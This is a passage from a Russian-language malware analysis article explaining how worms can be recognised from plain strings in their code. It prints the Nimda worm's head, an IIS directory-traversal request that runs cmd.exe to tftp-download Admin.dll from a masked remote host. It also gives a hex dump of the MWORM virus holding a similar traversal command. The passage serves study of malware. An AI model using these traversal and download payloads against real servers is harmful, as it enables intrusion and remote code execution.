Content- type: text/ xml,

Content- length: 3379

Листинг 5. Голова червя Nimda

GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/

c+tftp%20-i%20XXX.XXX.XXX.XXX%20GET%20Admin.dll%20c:Admin.dll

Если червь содержит в себе незашифрованные текстовые строки (а многие из червей устроены именно так!), то злобный характер его натуры распознается уже при беглом просмотре HEX-кода исследуемого файла:

Листинг 6. Фрагмент вируса MWORM

00005FA0:  47 45 54 20 2F 73 63 72 │ 69 70 74 73 2F 2E 2E 25   GET /scripts/..%

00005FB0:  63 31 25 31 63 2E 2E 2F │ 77 69 6E 6E 74 2F 73 79   c1%1c../winnt/sy

00005FC0:  73 74 65 6D 33 32 2F 63 │ 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/

00005FD0:  63 2B 63 6F 70 79 25 32 │ 30 63 3A 5C 77 69 6E 6E   c+copy%20c:winn

00005FE0:  74 5C 73 79 73 74 65 6D │ 33 32 5C 63 6D 64 2E 65   tsystem32cmd.e

00005FF0:  78 65 25 32 30 63 3A 5C │ 4D 77 6F 72 6D 2E 65 78   xe%20c:Mworm.ex

00006000:  65 20 48 54 54 50 2F 31 │ 2E 30 0D 0A 0D 0A 00 00   e HTTP/1.0♪◙♪◙

Некоторые черви в целях уменьшения своих размеров и не в последнюю очередь маскировки, сжимаются тем или иным упаковщиком исполняемых программ, и перед анализом их необходимо распаковать.

Листинг 7. Фрагмент вируса Love San после распаковки